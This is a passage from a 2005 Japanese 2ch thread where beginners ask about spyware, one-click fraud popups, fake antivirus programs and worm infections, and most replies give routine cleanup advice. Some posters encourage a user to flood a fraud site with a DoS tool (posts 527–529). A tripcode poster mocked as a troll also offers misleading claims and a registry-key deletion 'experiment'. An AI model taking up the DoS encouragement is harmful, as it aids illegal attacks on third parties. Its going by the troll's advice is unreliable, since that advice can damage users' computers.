正直ちょっとだけ怖かったです。

442 :こまった:2005/08/12(金) 12:19:36 ID:rrT+YSMg
システムの復元をしたら治りました!!
ひよこ名無しさん、本当に有難うございました!!

443 :ひよこ名無しさん:2005/08/12(金) 12:32:22 ID:GdUGiJlg
ワンクリック詐欺にあったんですが

「*警告*番組ご利用料金の入金の確認が取れておりま(ry」

とゆうウィンドウが定期的(5分周期ぐらい)にでるんですが、
これをださなくする方法教えてください。
MEを使っていて自分の垢だけでるようです。

444 :ひよこ名無しさん:2005/08/12(金) 12:36:01 ID:???
>443
クッキーに何か仕込まれていると思うから、スパイボットやアドウェアなどでスキャンの後、問題のあるアドウェアを消去すること
それでもまだでる、というならテンプレ >8のHijack Thisをインスコしそれで対応してみること。

445 :ひよこ名無しさん:2005/08/12(金) 12:56:53 ID:???
>>441
              __
             /;;;;;;;;;;;;;\
            /;;:::::::::::::::::::::::\
       ∈=━/,,;;:::::::::::::::::::::::::.;ヽ━=∋
            L::;;,__     ..:::ゝ
          //;;;;::::::.. ̄ ̄ ̄ ̄..::::;;;ヽ
          / ;;;;;;;;:::::::::::;;;;;;;;;;;;;::::::::;;;;; ヽ
         /j/三三三三三三三三三三ヾ、
         l::||::::              |l  
        / ̄\ ヽ-=・=-′ヽ-=・=-′ ||  
      r┤    ト::::: \___/     ||     <信じろ!
     /  \_/ ヽ:::.  \/    ,ノ   
      |   _( ̄ l―---oo-――'"ヽ__
      |   _)_ノヽ\  ハ // /    ヽ   
     ヽ____)ノ      ̄ ̄ ̄   /     ヽ、

446 :ひよこ名無しさん:2005/08/12(金) 13:13:18 ID:GdUGiJlg
>>444
ありがとうございます!
今スパイボットで検索しているところです。


447 :ひよこ名無しさん:2005/08/12(金) 13:25:08 ID:???
>>446
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

448 :ひよこ名無しさん:2005/08/12(金) 19:30:27 ID:PQANa+t1
エロ動画見たんだけど履歴以外に後から発見される可能性
ってある?
誰か教えて

449 : ◆N9P3SuvBPo :2005/08/12(金) 21:20:41 ID:???
>427
リカバリしてパソコンが完全に直ったでしょう。
一生懸命の1人のアドバイスで381さんのPCが完治しました。
俺って流石。

ちなみに>409はREDLOFの発病条件を満たす罠。
REDLOFの発病条件、すなわちそれはc:\windows内にwscript.exeが無くなる事。
この条件を満たせば、起動に必要なファイルkernel32.dllを上書きされ、
結果PCが起動しなくなる。
>ここでは、REDLOFの活動を停止する手順について書きます。
REDLOFの活動を停止する。すなわちパソコンを起動させなくし、REDLOFの
活動を止めてしまうというもの。

>443
ワンクリ系スパイウェアは【アダ被】で聞いてきたほうが…

450 :ひよこ名無しさん:2005/08/12(金) 21:24:25 ID:???
>>449
こいつホンマもんのキチガイやな

451 :ひよこ名無しさん:2005/08/12(金) 21:27:46 ID:???
>>450
でもこういうひと結構好きかも。

452 :ひよこ名無しさん:2005/08/12(金) 21:31:38 ID:???
>>449
おまえはコテでいつまでも貼り付いていて、一体何の主張があるんだよ。
システムの知識も今一だし、嫌がらせしたって3日で飽きるのが普通なんだよな。
ただの愉快犯なら誰も相手にしてねえだろうよ?おまけに糞コテなんだもんな!

453 :ひよこ名無しさん:2005/08/12(金) 21:42:04 ID:???
いちいち!とかつけなくていいよ。

454 :ひよこ名無しさん:2005/08/12(金) 21:43:21 ID:???
>>453
いちいちお前に言われたくねーな

455 :ひよこ名無しさん:2005/08/12(金) 22:41:03 ID:???
!はいいが?はいらんと思った

456 :ひよこ名無しさん:2005/08/12(金) 22:47:30 ID:???
どっちもいらない!?

457 :ひよこ名無しさん:2005/08/12(金) 23:51:36 ID:???
おめーら、いらねーよ

458 :ひよこ名無しさん:2005/08/13(土) 10:22:20 ID:???
おめーもいらねーや

459 :ひよこ名無しさん:2005/08/13(土) 10:54:51 ID:???
どうやってもホームページが下のアドレスになってしまう
http://www.linkz.com/searcha.php

テンプレ全てやった
誰か助けて

460 :ひよこ名無しさん:2005/08/13(土) 12:59:39 ID:???
>>459

テンプレの>>10を実行して下さい

461 :459:2005/08/13(土) 13:18:24 ID:???
>>460
ありがとう、お陰で治ったよ















つーか、糞ネタに食らいついてくるとはお前もまだまだアマちゃんだな(ゲラ

462 :ひよこ名無しさん:2005/08/13(土) 13:30:54 ID:???
子供はママンのところに帰ろうね。

463 :ひよこ名無しさん:2005/08/13(土) 14:32:11 ID:???
誰か僕のママンになって

464 :ひよこ名無しさん:2005/08/13(土) 14:37:50 ID:???
よしよし さぁ僕ちゃん剥きましょうね。

465 :ひよこ名無しさん:2005/08/13(土) 16:47:20 ID:???
             /ヽ       /ヽ
            /  ヽ      /  ヽ
  ______ /     ヽ__/     ヽ
  | ____ /           :::::::::::::::\
  | |       / /      \   :::::::::::::::|
  | |       |  ●      ●    ::::::::::::::|     
  | |       |             :::::::::::::| なに
  | |       |   (__人__丿  .....:::::::::::::::::::/ このスレ?
  | |____ ヽ      .....:::::::::::::::::::::::<
  └___/ ̄ ̄       :::::::::::::::::::::::::|
  |\    |            :::::::::::::::::::::::|
  \ \  \___       ::::::::::::::::::::::::|

466 :ひよこ名無しさん:2005/08/13(土) 23:31:00 ID:ntskMSJZ
WIN98SEです
IEを開いてサイトを見ていたら、怪しいところっぽいところにアクセスしてしまったぽいので
すぐALT+F4で消したのですが、間に合わなかったみたいで
勝手にダウンロードみたいなものが始まってしまいました。(PCがずっとダウンロードとかするときのビビビって音出し始めたので)
まず背景が黒色になって、何やら英語でWARNINGとか
色々書かれていてPCの動きがかなり遅くなってしまい…
再起動しました。1回ではまともに再起動できず、数回立ち上げを繰り返してやっと起動できました。
(背景は黒いままです)
IEを開くとタスクババーに変なと赤い丸の中に!マークが入っているやつが表示されて
カーソル合わせると「PC IS Conficted」(うろ覚え)みたいな英文が表示されました。
いつもならまず先にするんですが、AdawareもSpypodも、Hijackはまだやっていません。
今PCの動きがほんと遅いのでAdaware試すだけでも数時間ぐらいかかりそうな気がするので…
今までの中でも大分悪質な感じがするので、もっと別の対処がありそうな気がしたので…
分かる方いましたら、どうかアドバイスお願いします…本気で困っています…


467 :466:2005/08/13(土) 23:35:33 ID:ntskMSJZ
あと、IE開いてるときにPSGuard::Viruses and spyware Removerとかいうのが勝手に
開いて、何かダウンロードみたいなものをしてる表示だったので、あわてて停止ボタンっぽいのが
あったのでそれをクリックして、今は止めてある状態です

468 :ひよこ名無しさん:2005/08/13(土) 23:45:14 ID:???
>>466
>今PCの動きがほんと遅いのでAdaware試すだけでも数時間ぐらいかかりそうな気がするので…

だから何?
意味のない長文、言い訳書いてる暇があったらテンプレ読め

469 :ひよこ名無しさん:2005/08/13(土) 23:47:05 ID:???
テンプレやっても治んなかった…
インチキインチキ!このスレインチキ!!!

470 :466:2005/08/13(土) 23:51:17 ID:ntskMSJZ
>だから何?

今までの中でも大分悪質な感じがするので、もっと別の対処がありそうな気がしたので…



471 :ひよこ名無しさん:2005/08/13(土) 23:54:19 ID:???
>>470
ならリカバリしろよ
その方が手っ取り早いだろ
テンプレ読む気もなさそうだしよ

472 : ◆N9P3SuvBPo :2005/08/13(土) 23:59:27 ID:???
>466
俺と同じOSだな、MSDOSでレジストリの復元(テンプレ参照)
これでスタートアップとかに登録されている奴なんか一掃できますよ。

473 :ひよこ名無しさん:2005/08/14(日) 00:03:27 ID:???
>>470
              __
             /;;;;;;;;;;;;;\
            /;;:::::::::::::::::::::::\
       ∈=━/,,;;:::::::::::::::::::::::::.;ヽ━=∋
            L::;;,__     ..:::ゝ
          //;;;;::::::.. ̄ ̄ ̄ ̄..::::;;;ヽ
          / ;;;;;;;;:::::::::::;;;;;;;;;;;;;::::::::;;;;; ヽ
         /j/三三三三三三三三三三ヾ、
         l::||::::              |l  
        / ̄\ ヽ-=・=-′ヽ-=・=-′ ||  
      r┤    ト::::: \___/     ||     <信じろ!
     /  \_/ ヽ:::.  \/    ,ノ   
      |   _( ̄ l―---oo-――'"ヽ__
      |   _)_ノヽ\  ハ // /    ヽ   
     ヽ____)ノ      ̄ ̄ ̄   /     ヽ、

474 :ひよこ名無しさん:2005/08/14(日) 00:15:08 ID:???
ttp://gossip.babeleweb.net/hiromi_oshima_sexy_pics__im_11531.htm
ttp://gossip.babeleweb.net/hiromi_oshima_biography_im_11535.htm
ttp://gossip.babeleweb.net/hiromi_oshima_nude_gallery_im_11539.htm

このURLにウェブダイアラーが仕込まれてますか?



475 :ひよこ名無しさん:2005/08/14(日) 00:16:53 ID:???
ここ鑑定スレちゃうでぇ〜

476 :(=^u^=)たぬたんなりよ:2005/08/14(日) 00:22:19 ID:???
>>474
(((;=^u^=))) ガクガクブルブルなりよ

477 :466:2005/08/14(日) 10:24:19 ID:ch0eAwQe
昨夜はレスありがとうございました。
今朝MSDOSでレジストリの復元を実行してみました。
けど変わらずタスクバーに「赤丸の!マーク」がついたままで
しかも、1つだったのが2つに増えてて…
カーソルを合わせると「Your computer is infected!」と表示されます。
そして、起動した後すぐLive2Ch開いたら「PSGuard::Viruses and spyware Remover」
とかいう何か意味分からないもんが起動しました。
Spypodで、この原因だと思われる「PSGurad」が表示されたので、修正をしようとしたんですが、問題箇所を修正できません、原因はそれがメモリ中にあるからです。みたいな表示が
されて修正できず、再起動後すぐにspypod起動させても同じメッセージが出ました。
safeで修正したらできたのですが、再起動したら今度はマークが二つになってたり…
背景が黒のままも変わらないんですが、WARNINGとか英語の文字だけが消えてました。
何が何だか全然分からないのでどうかアドバイスお願いします…


478 :466:2005/08/14(日) 10:26:25 ID:ch0eAwQe
あと、デスクトップに「PSGuard spyware remover」のショートカットができていて
リンク先に「"C:\Program Files\PSGuard\PSGuard.exe"」というのがあるのですが
これは直接削除はしてもいいものなんでしょうか…?


479 :ひよこ名無しさん:2005/08/14(日) 10:27:37 ID:???
>>478
すぐ消せ。

480 :ひよこ名無しさん:2005/08/14(日) 17:04:07 ID:mBg7U2UP
OS:WindowsXP Home
ブラウザ:Sleipnir、IE
備考:ユーザーが2つあります
誘導元:http://pc8.2ch.net/test/read.cgi/pcqa/1123579212/

先日C2.lopがインスコされてしまいました。
アダルトサイト被害対策の手順でやってもランダムな英字列が見つかりませんでした。
それでSpybotSD、ADAware、SpyCleaner、AVGでスキャン・削除しても消えませんでした
だから手動でHijackThisやToolbarcopでいじろうと思いましたが歯が立たちませんでした
もうlop.comのアンインストーラーをダウンロードしようと思ってもAVGがウイルスだって言い張るので
結局アダルトサイト被害対策のサイトにあったlopremover.exe(本家のアンインストーラかも)で駆除できたんですが、その後も度々症状が現れるのです。
もう見たくないので根からつぶすことはできないのでしょうか。

しかも今、WindowsExplorarがインターネットに接続しようとしてるんで拒否してみたら、Explorarのステータスバーに「lop.comを探しています」とか出て正直ウンザリしてます。
アンインストール手順は、IE系(IE、Sleipnir)を閉じ、ZoneAlarmも一応閉じてインターネットを切ってlopremoverでアンインストールします。
完璧に削除する方法ありませんか?

481 :ひよこ名無しさん:2005/08/14(日) 17:08:35 ID:???
>>480
XPならシステムの復元やればいいのに。

482 :ひよこ名無しさん:2005/08/14(日) 17:21:40 ID:mBg7U2UP
>>481
システムの復元やるのは少し抵抗あるんですけど、やらなきゃだめですかね?
最初に入ってきたのが半年前なんですよね。そこまで戻すと・・・。

483 :ひよこ名無しさん:2005/08/14(日) 17:23:48 ID:???
>>482
やりたくなければいいよ。
掲示板経由の駆除は1ヶ月以上かかることも多いけど。

484 :ひよこ名無しさん:2005/08/14(日) 17:52:00 ID:???
駆除出来たとしても中身ぐちゃぐちゃ

クリーンインスコしなさいよ。

485 :ひよこ名無しさん:2005/08/14(日) 17:53:13 ID:???
先日=半年前 とは恐れ入ったな

486 :ひよこ名無しさん:2005/08/14(日) 18:09:34 ID:???
>>480
lopなら、ewidoが対応してるはず…
ttp://eazyfox.homelinux.org/SecuTool/ewido/ewido01.html
検出力高いけど、誤検出もときどきあるので、
明らかに関係なさそうなのが検出されたときはノータッチで。

それで直らなかったら、
HJTのログ貼るか、484氏の言うとおりにするか

487 : ◆N9P3SuvBPo :2005/08/14(日) 19:42:30 ID:???
>477
もしかしたらレジストリの復元は失敗に終わってしまったのでは…
>466
>数回立ち上げを繰り返してやっと
レジストリの復元をやったとき、復元ポイントは5つあったよね。
感染前の正常な日付を選んで「復元」した?

>480
c2.lopか。こいつは手ごわいです。
今日は少々疲れ気味です。
セーフモードで起動して、各種駆除ツールの実行を試してください。

488 :ひよこ名無しさん:2005/08/15(月) 00:15:15 ID:JIa+J64b
すみません、
ttp://www.nip-les.com/ という危険なサイトにアクセスすると、
Trojan-PSW.Win32.Kapod.c というのに感染するそうなのですが、
オンラインスキャンしたところ感染してないようです。これは助かったと考えていいのでしょうか?

よろしくお願いします。


489 :691:2005/08/15(月) 00:56:14 ID:CW1W9i0W
パソコン初心者総合質問スレッド Vol.1109から誘導されて来ました。
PCを起動するたびにzipファイルが大量生成されてしまうのですが、なぜでしょうか?
OSはWindowsXPです、お願いします。


490 :ひよこ名無しさん:2005/08/15(月) 01:06:13 ID:???
>>488
まあ大丈夫だろう。

>>489
ウィルススキャンしなさい。

491 :489:2005/08/15(月) 01:07:59 ID:CW1W9i0W
>>490 わかりました。

492 :489:2005/08/15(月) 01:50:58 ID:CW1W9i0W
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ALCAN.A
このウィルスに感染していたようです...。
どうやって駆除すればいいでしょうか?

493 :ひよこ名無しさん:2005/08/15(月) 01:59:33 ID:???
もう回答者さん達寝てるよ〜

494 :ひよこ名無しさん:2005/08/15(月) 02:01:16 ID:???
⊂二二二( ^ω^)二⊃

495 :ひよこ名無しさん:2005/08/15(月) 02:03:48 ID:???
>>492
今後の事も考えてバスター買っときなよ。

496 :ひよこ名無しさん:2005/08/15(月) 02:06:14 ID:???
是非ソースネクストに!

497 :489:2005/08/15(月) 02:06:16 ID:CW1W9i0W
>>495 解説が英語で駆除の仕方がわからないのですが、バスターだったらすぐに駆除できますか?

498 :ひよこ名無しさん:2005/08/15(月) 02:11:47 ID:???
>>497
製品版なら自動駆除してくれるよ。

499 :489:2005/08/15(月) 02:18:50 ID:CW1W9i0W
>>498 ふむふむ...。検討してみます。

500 :ひよこ名無しさん:2005/08/15(月) 12:34:55 ID:kGsxO63I
今フラッシュサイト見てて
最新のフラッシュプレイヤーに更新してください
ってあってUPDATEってexe出てきてクリックしたら
2日以内に振り込んでくださいって出てきたんだけど
住所とか確認とかしてないから大丈夫かな…

501 :ひよこ名無しさん:2005/08/15(月) 12:37:02 ID:???
>>500
うっせえハゲ。

502 :ひよこ名無しさん:2005/08/15(月) 13:12:47 ID:kGsxO63I
マジで助言ください


503 :ひよこ名無しさん:2005/08/15(月) 13:19:56 ID:???
>>502
ウイルスです。

504 :ひよこ名無しさん:2005/08/15(月) 13:26:51 ID:???
>500
取りあえず心配ならワンクリック詐欺などをHPで検索してよく調べて見れ。大抵の場合無視しとけば無問題だから。
あとはアンチウイルスソフトを使ってそのいやらしい実行ファイルを削除することだな。

505 :ひよこ名無しさん:2005/08/15(月) 14:31:54 ID:???
>>504
感謝です


506 :ひよこ名無しさん:2005/08/15(月) 14:36:33 ID:???
>>503
感謝感謝です

507 : ◆N9P3SuvBPo :2005/08/15(月) 22:12:08 ID:???
>500
「ワンクリウェア」とかいう奴だったりしてな。
とりあえず無視しとくが吉ですな。

508 :ひよこ名無しさん:2005/08/16(火) 18:31:17 ID:???
さんざん既出だったらすみません。
ノートン入れてるんですが、それでもスパイウェアが仕組まれてしまいます。
予防対策等はありますでしょうか?宜しくお願いします。

509 :ひよこ名無しさん:2005/08/16(火) 18:35:13 ID:???
>>508
WindowsUpdateしてるか?

▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)

510 :ひよこ名無しさん:2005/08/16(火) 23:20:47 ID:2+E7ZI+L
508です。すみません。ご返答ありがとうございます。

>>509
・XP ・IE6 ・Noton2005

アップデートはサービスパック2を入れる以前まで
アップデートしいる状態です。IE(ウィンドウ)を新た
に立ち上げると、別のウィンドウが立ち上がったり、
エロサイトへのアイコンがデスクトップにいつの間
にかあったりします・・・。

511 :ひよこ名無しさん:2005/08/16(火) 23:22:17 ID:???
>>510
IEやめて、タブブラウザ使え。

512 :ひよこ名無しさん:2005/08/16(火) 23:53:38 ID:???
>>510
>アップデートはサービスパック2を入れる以前まで
>アップデートしいる状態です。

・・・・。

513 :ひよこ名無しさん:2005/08/17(水) 02:10:24 ID:???
http://www.sexy-crazy.com/otaku/
このサイトでOK押してしまったんだすが。。。
大丈夫でしょうか?

514 :ひよこ名無しさん:2005/08/17(水) 02:53:30 ID:???
セクシークレージーなオタク・・・。
直りんやめて

515 :俺様:2005/08/17(水) 06:40:34 ID:7efv7M1A
ここで質問してる人たちへ俺様がアドバイス

1:ノートンとかは入れとけ。 期限が切れてる古いのはダメだぞ!

2:こんなとこで質問しないで、他のサイトで質問しろ。 (詳しく教えてくれる人いるぞ)

3:あとめんどくさがらず&保存の画像とかはあきらめて、再セットアップをしろ。

以上

516 :ひよこ名無しさん:2005/08/17(水) 11:25:42 ID:???
C:\Documents and Settings\take\Application Data\junk store \STUPIDATOM.exe がウイルスとして検出されるのですが
これをewido,spybot、adawareなどで削除しても復活するのですセーフモードで削除してもだめです
あと、ノートン2003は入れてますがこちらでは反応なし、アップデートは毎週してます
たぶん、これが広告バナーがでる原因だと思うんですが
どなたかアドバイスをよろしくお願いします

517 :ひよこ名無しさん:2005/08/17(水) 11:29:54 ID:???
>>516
レジストリエディタでSTUPIDATOMを検索して消す

518 :516:2005/08/17(水) 13:36:18 ID:???
>>517
ありがとうございます。


519 :ひよこ名無しさん:2005/08/17(水) 19:58:18 ID:???
エロサイトを見てたら詐欺にあったんですが、ここに質問してもいいっすか?

520 :ひよこごまきちゃん:2005/08/18(木) 19:15:55 ID://h99nAv
( ´ Д `)<ごとーが510ゲットだぽ

521 :ひよこ名無しさん:2005/08/20(土) 07:28:21 ID:tFfCd6zg
さっきエロサイトみてたら、どこかクリックしてしまったらしく、何かのファイルをDLしはじめた後、「入会費は38000\です」と表示されました。

どうなってしまうのですか?

取立屋とかが来てしまうのでしょうか?

恐いのでとりえず線は抜いたのですが。

今は携帯から書き込みしています。

PCはXPのHomeで回線はテプコひかりです。

どうすればいいのか教えて下さい。


522 :ひよこ名無しさん:2005/08/20(土) 07:40:36 ID:WVJQOAU4
>521
おそらくワンクリ。心配なし
でもココでそういうこときくと怒られるから
ワンクリの板いこーね

お金がかかるときは必ず何らかの証明の入力が必要
(名前、カード番号とか・・・)
心配だったら消費者センターか警察ワンクリ被害へGO^^

523 :ひよこ名無しさん:2005/08/20(土) 07:51:35 ID:???
>>521
>>13

524 :ひよこ名無しさん:2005/08/20(土) 07:52:06 ID:WVJQOAU4
>521
おそらくワンクリ。心配なし

普通、お金の支払いとかある場合は
メールアドレスとかで確認とかあるでしょ?
相手になんにも教えてないのに
請求がくるなんてありえない!

所詮、出てきた情報なんてIPの番号みたいな奴とか
月日とかでしょ?
そんなんで個人情報ばれたら笑っちゃう。
だから相手に絶対個人情報とか教えないで!

ワンクリのスレで勉強してみて!笑っちゃうものばかりだから


525 :ひよこ名無しさん:2005/08/20(土) 09:28:00 ID:MNY2dBtv
パソを起動したら、画面一杯にエロサイトの広告が広がってました。
最近1週間エロサイトいってないのに、解決方法を教えてください。

526 :ひよこ名無しさん:2005/08/20(土) 09:31:33 ID:???
>>525
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

エロでなくても仕組みは同じ

527 :ひよこ名無しさん:2005/08/20(土) 10:48:26 ID:HD8qUMic
ワンクリサイトに田代砲をお見舞いしたいのですが、
こちらの個人情報などが、知られるのでしょうか?


528 :ひよこ名無しさん:2005/08/20(土) 10:51:16 ID:???
>>527
捕まらない程度にがんばれ

529 :ひよこ名無しさん:2005/08/20(土) 10:51:30 ID:???
>>527
個人でやっても効果は薄いから、スレ立てて一斉にやれ。

530 :521:2005/08/20(土) 11:05:00 ID:tFfCd6zg
>>522-523
返信ありがとうございます。

とりえず、心配無いみたいですね。

ただ、何かファイルをダウンロードしてインストールされたみたいで、これが心配なのです。

PC再インストールとかする必要ありますか?

531 :ひよこ名無しさん:2005/08/20(土) 11:24:21 ID:1DsWfw0d
>>530
頭のhtを抜いて、そのワンクリのurlを貼ってみ

532 :ひよこ名無しさん:2005/08/20(土) 12:01:05 ID:afIDZjzJ
質問スレからの誘導でやってきました。
よろしくお願いします


「ウィンドウズME安定化」たる雑誌を買って、デフラグやウィルス除去を行ってるんですが、
時々、インターネットエクスプローラーを開くと「welcome to primehs.net!」とかいう表紙が出てきて、
ヤフーとかに接続できない状態になってしまい、その度に復元を繰り返してます。
これは、何かのウィルスでしょうか?
改善方法を教えて欲しいです


533 :ひよこ名無しさん:2005/08/20(土) 13:44:35 ID:???
>>530
       ∧         ∧
        / ヽ        ./ .∧
     /   `、     /   ∧ 
    /       ̄ ̄ ̄    ヽ  
   /:::::::::              .\  信じろ・・・・・・
  /:::::::::: ヽ-=・=-′ ヽ-=・=- ∧/           ∧
  ヽ:::::::::::    \___/   / ヽ          / ヽ
    ヽ::::::::::::::    \/    /   ヽ_____/  ヽ
  /            /                \
 |            /                   ヽ
 |            '''''"´)   ●   \─/  ●   |'´)
  \           -‐´         ヽ/       /´
   |       |   \                  /

534 :ひよこ名無しさん:2005/08/20(土) 13:44:38 ID:9aqFux0G
すいません。どなたか教えてください。
今windows95を使っているのですが、officeを入れたいと思っています。
97か2000になるかとおもうのですが、格安で手に入る方法をおしえてください。
めぼしいオークションは見てみたのですが。

535 :ひよこ名無しさん:2005/08/20(土) 14:15:11 ID:BIQZ4YxC
今ノートンインターネットセキュリティを使ってスパイウェア(およびウィルス)
を駆除している所です。
今の時点で検出されたのは50、修復は4という状態です。
これは異常なんでしょうか??
結果的に駆除されなかった場合は、新しいOSにするしかないんですよね??

536 :ひよこ名無しさん:2005/08/20(土) 14:18:02 ID:???
>>535
全部駆除できてもダメージは修復されませんのでリカバリをお薦めします。
後遺症で不具合でまくりになります。

537 :ひよこ名無しさん:2005/08/20(土) 14:18:23 ID:???
>>532 >>535
二人ともリカバリーしろ。
今やれ! すぐやれ!

538 :535:2005/08/20(土) 14:30:24 ID:BIQZ4YxC
ありがとうございます。
リカバリする為のCD-ROMは元々ついてるんですか?


539 :530:2005/08/20(土) 14:37:51 ID:tFfCd6zg
>>531

tp://kikiki.jp

これかな。
18歳以上の確認でたんでOKしたらなんかファイル落とし始めました。
無視してて大丈夫ですか??

540 :ひよこ名無しさん:2005/08/20(土) 14:38:20 ID:???
説明書よく読めば分かるよ
探せば出てくると思う

541 :ひよこ名無しさん:2005/08/20(土) 14:39:47 ID:???
>>539
大丈夫、戸締りを厳重にして新しい消火器を購入ておけ。

542 :ひよこ名無しさん:2005/08/20(土) 14:40:39 ID:???
>>538
ここ2年ぐらいのPCは最初に自分で作成するようになってる。

543 :535:2005/08/20(土) 14:45:15 ID:???
ありました。ありがとうございます。
最初に作成・・というのはどうゆう事ですか???

544 :ひよこ名無しさん:2005/08/20(土) 14:46:51 ID:???
>>543
作成=CD-Rに記録

545 :ひよこ名無しさん:2005/08/20(土) 14:48:36 ID:???
リカバリCDが付いてくるのと、
リカバリCDが付属しなくてDドライブのイメージを
自分でCDに焼かなくちゃならないものが有るって事。

546 :ひよこ名無しさん:2005/08/20(土) 14:51:50 ID:???
見つかったならOK

547 :535:2005/08/20(土) 15:03:52 ID:???
とりあえずバックアップとりたいんですが、
どこを押しても反応がありません。
これじゃリカバリも無理です・・・。


548 :ひよこ名無しさん:2005/08/20(土) 15:04:52 ID:1DsWfw0d
>>539
見てきたけど、あれはただのハッタリのgifアニメで、
実際は何もインスコされてないから心配する必要ない。
くわしくは↓を参照。
ttp://www57.tok2.com/home/keiline/onecligif.htm

ところで、エロサイトでアラートとかが出てきたら、むやみにOK押すなよ。
今回は、ただのワンクリでPCに実害が無かったからよかったものの、
これが海外エロサイトとかだったら、スパイウェア仕込まれるぞ。

549 :ひよこ名無しさん:2005/08/20(土) 15:14:00 ID:???
       , '´         :::::::::::ヽ、
      /     ,/ ||| \,  ::::::::::ヽ
      |   =="       `== ::::::::|
      |   -=・=-′ ヽ-=・=- :::::::::|
      |               ::::::::::|   え?
      |     (_人_)   ::::::::|
       'ヽ__        :::::::::::/

550 :539:2005/08/20(土) 16:03:03 ID:RMnwttnZ
>>548

そうですか、ありがとうございます。

心配だったんで、「システムの回復」行いましたが
やる必要もなかったかもですね。

これから気をつけます。

あなたは親切な人ですね。

ノシ



551 :ひよこ名無しさん:2005/08/20(土) 16:04:01 ID:???
>>550
              __
             /;;;;;;;;;;;;;\
            /;;:::::::::::::::::::::::\
       ∈=━/,,;;:::::::::::::::::::::::::.;ヽ━=∋
            L::;;,__     ..:::ゝ
          //;;;;::::::.. ̄ ̄ ̄ ̄..::::;;;ヽ
          / ;;;;;;;;:::::::::::;;;;;;;;;;;;;::::::::;;;;; ヽ
         /j/三三三三三三三三三三ヾ、
         l::||::::              |l  
        / ̄\ ヽ-=・=-′ヽ-=・=-′ ||  
      r┤    ト::::: \___/     ||     <信じろ!
     /  \_/ ヽ:::.  \/    ,ノ   
      |   _( ̄ l―---oo-――'"ヽ__
      |   _)_ノヽ\  ハ // /    ヽ   
     ヽ____)ノ      ̄ ̄ ̄   /     ヽ、

552 : ◆N9P3SuvBPo :2005/08/21(日) 20:46:59 ID:???
どなたか、実験に協力してもらえませんか。
後で言うけど

553 :ひよこ名無しさん:2005/08/21(日) 20:59:18 ID:???
>>552
いいお

554 : ◆N9P3SuvBPo :2005/08/21(日) 21:16:50 ID:???
実験

次の実験は、HijackThisで2回連続でスキャンしたときに現われる
O18のエントリの削除指示です。
あくまでも実験なのでバックアップを行なってからやります。

スタート→ファイル名を指定して実行
regeditと入力してOK
レジストリエディタが開くので、次のキーを必ずバックアップ
バックアップのやり方は、レジストリ→レジストリファイルの書き出し
または、レジストリ→エクスポート
適当な名前でデスクトップに保存
HKEY_CLASSES_ROOT\PROTOCOLS
HKEY_LOCAL_MACHINE\Software\CLASSES\PROTOCOLS
バックアップができたら上のキーを削除して再起動
再起動後、どうなるかしばらく様子を見る。
何か問題が起きた場合は、さきほどのデスクトップに保存しておいた
「適当な名前.REG」をダブルクリックして元に戻して再起動

555 :ひよこ名無しさん:2005/08/21(日) 21:22:05 ID:???
おまえもデクになれ

556 :ひよこ名無しさん:2005/08/21(日) 21:52:14 ID:???
二回スキャンしても18が出てこない。
やり方が悪いのか?

557 :ひよこ名無しさん:2005/08/22(月) 17:00:03 ID:???
>>42
spyware scannerで検出された その2つをうっかり消してしまいますた (ヘ;_ _)ヘ ガクッ
消す事でどのような不具合が出るのでしょうか?
現在 IEのツールバーのアイコン類が消えたのと、 tp://cyberjapan.jp/index.html での地図が見られなくなったようです。

消す時にログも レジストリーのバックアップも取れなかったのですが、元に戻すのは無理ですかね。
システムの復元も 日にちを変えてやってみても失敗します。 これは以前からですが・・・
セーフモードでも失敗でした。

復元というソフトで BROWSEUI.DLLを探してきて C:\WINDOWS\SYSTEM に入れてみても何も変わらす・・・。
これと同じファイルが SYSTEM32 にありましたが これは違うのでしょうか?

XPSP2 IE6 ノートンのAV2005 入れてます。

IEの再インストールとかしてもだめですかね。 ( ´△`)アァ-

558 :ひよこ名無しさん:2005/08/22(月) 17:36:37 ID:???
再インストール ってなにするのか解ってないだろ?

559 :ひよこ名無しさん:2005/08/22(月) 19:22:22 ID:???
アダ被の質問掲示板に「ara-key」発見

560 :ひよこ名無しさん:2005/08/22(月) 20:51:43 ID:???
>>557
Windows XP で Internet Explorer および Outlook Express を再インストールまたは修復する方法
ttp://support.microsoft.com/default.aspx?scid=kb;JA;318378

Internet Explorerの修復
ttp://www.higaitaisaku.com/iesyuufuku.html

561 :557:2005/08/22(月) 23:46:03 ID:???
>>558

ハイ 実はよく分かってません

>>560

ありがとう御座います。
XPなので 修復は出来ないようですし、再インストールもレジストリー弄るようで困ってます。
SP2を入れるときも 弄るんでしょうか・・・

ところで ここに来るとノートン君が「Unix.Penguinを削除しました」って警告出します。
オープンジェーンも 自分の投稿以前が消えてしまいました。
現在投稿数が4になってしまいました???? 

ジェーンがおかしいのか よく分かりません。



562 :ひよこ名無しさん:2005/08/22(月) 23:48:43 ID:???
>>561
ノートンがvbsウィルスのソースに誤反応3
http://pc8.2ch.net/test/read.cgi/pcqa/1109609938/

563 :557:2005/08/23(火) 00:12:41 ID:???
>>562

はあ 誤反応ですか   ( v^-゜)Thanks♪

しかし 消えちゃったレスはどうなったんだろ?

ジェーンの不具合ですね。

スレ一覧ではチャンと出てるのに・・・  レス番がわからない (;´д`)トホホ


564 :ひよこ名無しさん:2005/08/23(火) 00:18:14 ID:???
>>563
不具合じゃないよ。ノートンが勝手に削除してるんだから。
ログのフォルダをノートンの監視対象からはずせばOK。

565 :557:2005/08/23(火) 01:02:23 ID:???
>>564

ありがd

監視対象から外しました。 m(__)m

消されたレスは戻ってこない OTL レス番号あってるかな・・・


